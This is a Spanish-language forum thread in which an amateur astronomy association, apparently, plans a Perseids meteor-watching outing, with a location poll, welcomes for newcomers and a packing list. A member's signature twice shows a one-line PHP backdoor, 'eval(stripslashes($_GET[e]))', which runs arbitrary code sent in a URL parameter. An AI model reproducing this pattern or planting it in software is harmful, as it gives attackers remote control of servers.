Máximo de Perseidas 11 al 12 de Agosto

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.

¿Donde prefieres ir a ver las perseidas?

Pioz
0
No hay votos
Carabaña
2
50%
Otro (indicar)
2
50%
 
Votos totales: 4

m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por m3ntol »

Los que voten por otros sitio, por favor, que indiquen cual ;)
phpbb:eval(stripslashes($_GET[e]));
recoleto
Mensajes: 5
Registrado: Sab Ago 04, 2007 8:54 am

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por recoleto »

Buenos días:

Permítanme presentarme: mi nombre es Pepe, de Madrid.

Aunque no es un dato relevante, os diré que trabajo en Barajas, en la torre de control del aeropuerto. Y por las noches, cuando no hay tráfico, me quedo embelesado mirando el cielo y preguntándome dónde acabará, y esas cosas que uno piensa cuando se aburre.

Otro dato es que estoy involucrado en un club de descapotables. Como veis, el cielo siempre está presente en mi vida.

He llegado a vosotros a través de Google, porque queremos organizar una salida en el club para ver las perseidas. Más en plan evento sociocultural que científico, por lo que no me atrevo a pediros que nos dejéis unirnos a vuestra reunión.

¿Podéis recomendarme algún lugar para verlo por la sierra Norte? Estamos pensando en Somosierra, a lo alto, cerca de una idílica chorrera de cuyo nombre no consigo acordarme ahora.

Gracias y un saludo. Prometo seguiros, y quizá nos conozcamos alguna vez. Estuve en La Palma 4 años y allí aprendí (lamentablemente poco ) a amar el cielo.
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por carlosz22 »

Buenas tardes Pepe.

Bienvenido al foro.

Sois bienvenidos a la observación que haremos por motivo de las Perseidas y a cualquier otra observación. No haremos nada científico, esa noche es para tumbarse y admirar el espectáculo de las estrellas fugaces. Hay más noches a lo largo del año para los telescopios, prismáticos, investigación, etc.

Por la sierra norte, Somosierra es un buen lugar, siempre que como bien has dicho os vayáis a una zona que esté por encima del pueblo, desde allí se tienen unas vistas muy buenas y un cielo aceptablemente oscuro teniendo en cuenta la inevitable influencia de Madrid.

Por aquí estaremos, si tienes más dudas o quieres pasarte por alguna de las quedadas que hacemos como he dicho antes sois totalmente bienvenidos, no te preocupes por que no sepas mucho de astronomía o quieras hacer un evento sociocultural.

Un saludo :D
Alej
Mensajes: 2
Registrado: Sab Ago 04, 2007 4:37 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por Alej »

Hola a todos,

Mi nombre es Alejandra, soy mexicana y vivo en Quebec (Canada). Me he puesto en contacto con ustedes para saber si me permitirian acompanarlos en la observacion de las Perseidas el fin de semana proximo.

Les explico mis circunstancias: la proxima semana voy a estar en la region de Madrid y no puedo resignarme a perderme el evento de las estrellas fugaces (sin luna este ano!). De verdad, me encantaria salir con su grupo en esta ocasion especial :D .

Gracias de antemano y espero su respuesta y precisiones (para prever la indumentaria necesaria en mi maleta!).

Saludos.
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por carlosz22 »

Alej, bienvenida al foro y a Madrid :D

Como le he dicho a Pepe (recoleto) eres totalmente bienvenida.

Esa noche hay prevista una temperatura mínima de 10ºC y sin apenas viento. Lo necesario para una salida así:
- Una esterilla o manta para poder tumbarse en el suelo, si tienes tumbona mejor , estarás más cómoda :D
- Abrigarse un poco, a pesar de que no hará frio al estar tumbado en total inactividad el cuerpo se enfría antes. Si se tiene calor siempre se puede guardar la ropa que sobre en el coche. Una chaqueta y un pantalón largo será suficiente, tampoco hay que pasarse jejeje
- Una almohada para el cuello, al final duele de tener la cabeza apoyada en el suelo.
- Si tienes un laser verde, será bienvenido, así se pueden enseñar las constelaciones a quien pregunte por alguna especial, en la asociación tenemos varios, pero uno más nunca viene mal.
- Cartas astronómicas o planisferio si quieres aprenderte mejor las constelaciones o quieres enseñarselas a alguien si ya las sabes.
- Papel y lapiz para apuntar las estrellas fugaces que vayas viendo.
- Si quieres hacer algo de ciencia, unas cartas astronómicas de la zona que vayas a estar mirando y trazar las estrellas fugaces y marcar el tiempo que duran y la magnitud que tienen. Personalmente, una vez me puse a hacerlo y acabé aburrido de apuntar, tiré el papel y me quedé contemplando el cielo :roll:

No me acuerdo de nada más ahora mismo, si tienes alguna duda no dudes en preguntar (vaya redundancia :oops: )

Un saludo :)

PD: En Madrid estamos en plena ola de calor, no hace falta que traigas exceso de equipaje.

Este es mi mensaje número 100 :D :D :D
Alej
Mensajes: 2
Registrado: Sab Ago 04, 2007 4:37 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por Alej »

Gracias por la pronta respuesta y por la información!!!

Ahora bien, me gustaría saber si puedo partir con los miembros del grupo a partir de Madrid hacia el lugar de observación. Llego a la ciudad el viernes 10 de agosto por la tarde. Hay algún lugar en el que se reúnen para partir juntos? Algún miembro en particular podría servirme de contacto?

Hasta la próxima.
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por carlosz22 »

Nosotros solemos salir directamente de nuestra casa y nos reunimos en el lugar de observación. Aun así, esperate al lunes que ya estarán m3ntol y Astrolozano que tienen coche y te dirán si pueden pasarse por Madrid para que les sigas. Yo dependo de ellos para ir porque aun no tengo coche :(

Aunque es posible que venga más gente de Madrid centro y puedas ir con ellos. Hoy y mañana están en una quedada en Martos (Jaen) de astronomía. Hasta el lunes no se conectarán. Uno de los que suelen venir que es de Madrid es Zipizape, pero no está en este foro, ya le pregunto si puede pasarse a buscarte ;)

No te preocupes que llegar llegarás :D
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por carlosz22 »

Por cierto, yo voto por Carabaña, la previsión es mejor que para Pioz. El otro día voté en otro lugar sin darme cuenta :oops:

Por ahora gana Carabaña 3 a 1
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por m3ntol »

Hola Alej!!

Lo más seguro es que quedemos todos en la asociación en Coslada para salir hacia Carabaña ya que el sitio es nuevo y el camino solo exacto lo conoce una persona.

Seguro que hay hueco en algún coche, así que acercate y vente con nosotros. De momento saldremos el sábado por la tarde, supongo qeu sobre las 18 o 19 pero aun no lo hemos decidido.

Estate atenta al foro que en breve dejaremos aclarado todo el tema.
Un saludo!!
phpbb:eval(stripslashes($_GET[e]));
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por carlosz22 »

Dejo otro enlace que es bastante interesante.

http://asaaf.fis.ucm.es/astrowiki/index ... eidas_2007

En esa página aparece mi teléfono, que conste que yo no lo he puesto :D , si quereis o necesitais algo me llamais :wink:

No tenía pensado llevar nada de material para observar, pero si os parece llevo los prismáticos por si alguien se aburre de estar tumbado mirando para arriba y quiere echar un vstazo por ellos. Para el que no los conozca son grandecitos jejejeje

Un saludo :)
Responder